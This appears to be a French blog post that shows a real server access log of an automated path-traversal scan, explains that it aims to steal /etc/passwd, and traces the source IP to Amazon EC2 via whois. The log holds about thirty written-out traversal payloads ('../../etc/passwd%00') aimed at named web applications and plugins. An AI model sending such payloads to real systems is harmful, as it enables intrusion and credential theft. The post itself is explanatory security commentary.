Un bel exemple de cyberattaque L7

A quoi ressemble une cyberattaque dans la réalité (et pas comme au cinéma où une jolie tête de mort apparaît sur l’écran d’un ordinateur) ?

Et bien à ça :

107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /KikChat/private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 500 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 492 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 554 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 550 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /gwebmail/?module=../../../../etc/passwd%00 HTTP/1.0” 404 490 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /?module=../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /spywall/languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0” 404 505 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0” 404 497 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /spywall/releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0” 404 505 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] “GET /releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0” 404 497 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] “GET /asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 404 523 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 404 502 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0” 404 494 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 496 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 487 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0” 404 493 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /idoit/controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0” 404 501 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0” 404 495 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /jcow/index.php?p=../../../../../../etc/passwd%00 HTTP/1.0” 404 495 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /index.php?p=../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /vanilla/index.php?p=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 498 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 531 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 528 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 520 “-” “-“

Les traces réelles d’une cyberattaque…

Joli, non ?

La toute  petite taille de caractère permet d’avoir une vue d’ensemble. Les non informaticiens n’en verraient pas plus en plus gros. Les autres sauront comment accéder à une présentation plus lisible.

L’attaque (85 tentatives en 24 secondes à 23:17 hier soir) cherche à exploiter des failles de sécurité pour récupérer le fichier qui contient les mots de passe du serveur. Ils y sont sous leur forme cryptée mais ce fichier récupéré pourrait être confortablement soumis à un traitement de décodage intensif et donner ainsi un accès pratique au serveur visé par l’attaque.

L’attaquant est identifié par 107.23.240.63, son adresse IP.  On obtient facilement une description plus complète à son sujet :

NetRange:       107.20.0.0 – 107.23.255.255
CIDR:           107.20.0.0/14
OriginAS:
NetName:        AMAZON-EC2-8
NetHandle:      NET-107-20-0-0-1
Parent:         NET-107-0-0-0-0
NetType:        Direct Assignment
Comment:        The activity you have detected originates from a dynamic hosting environment.
Comment:        For fastest response, please submit abuse reports at http://aws-portal.amazon.com/gp/aws/html-forms-controller/contactus/AWSAbuse
Comment:        For more information regarding EC2 see:
Comment:        http://ec2.amazonaws.com/
Comment:        All reports MUST include:
Comment:        * src IP
Comment:        * dest IP (your IP)
Comment:        * dest port
Comment:        * Accurate date/timestamp and timezone of activity
Comment:        * Intensity/frequency (short log extracts)
Comment:        * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
RegDate:        2011-05-03
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-107-20-0-0-1OrgName:        Amazon.com, Inc.
OrgId:          AMAZO-4
Address:        Amazon Web Services, Elastic Compute Cloud, EC2
Address:        1200 12th Avenue South
City:           Seattle
StateProv:      WA
PostalCode:     98144
Country:        US
RegDate:        2005-09-29
Updated:        2009-06-02
Comment:        For details of this service please see
Comment:        http://ec2.amazonaws.com/
Ref:            http://whois.arin.net/rest/org/AMAZO-4

L’attaque est donc menée depuis un serveur virtuel proposé à  location à n’importe qui sur le “Cloud” par une compagnie américaine installée à Seattle. La description fournit même des indications sur la procédure à utiliser pour dénoncer les abus, à condition de révéler les détails de son identité, évidemment !

L’attaque, sans doute menée en parallèle sur des milliers d’autres ordinateurs, a certainement abouti quelque part et fourni par exemple aux cyber-pirates un nouveaux serveur pour lancer d’autres attaques. C’est une activité très répandue de nos jours et facilement praticable en toute impunité.

Et le “L7” ?

“L7” signifie ici “level 7” (niveau 7) et fait référence à la plus haute  couche du modèle ISO 7498. Ce modèle abstrait désigne une classifications par ailleurs complètement inutile mais en l’occurrence, une “cyberattaque de niveau 7” fait tout de suite beaucoup plus sérieux.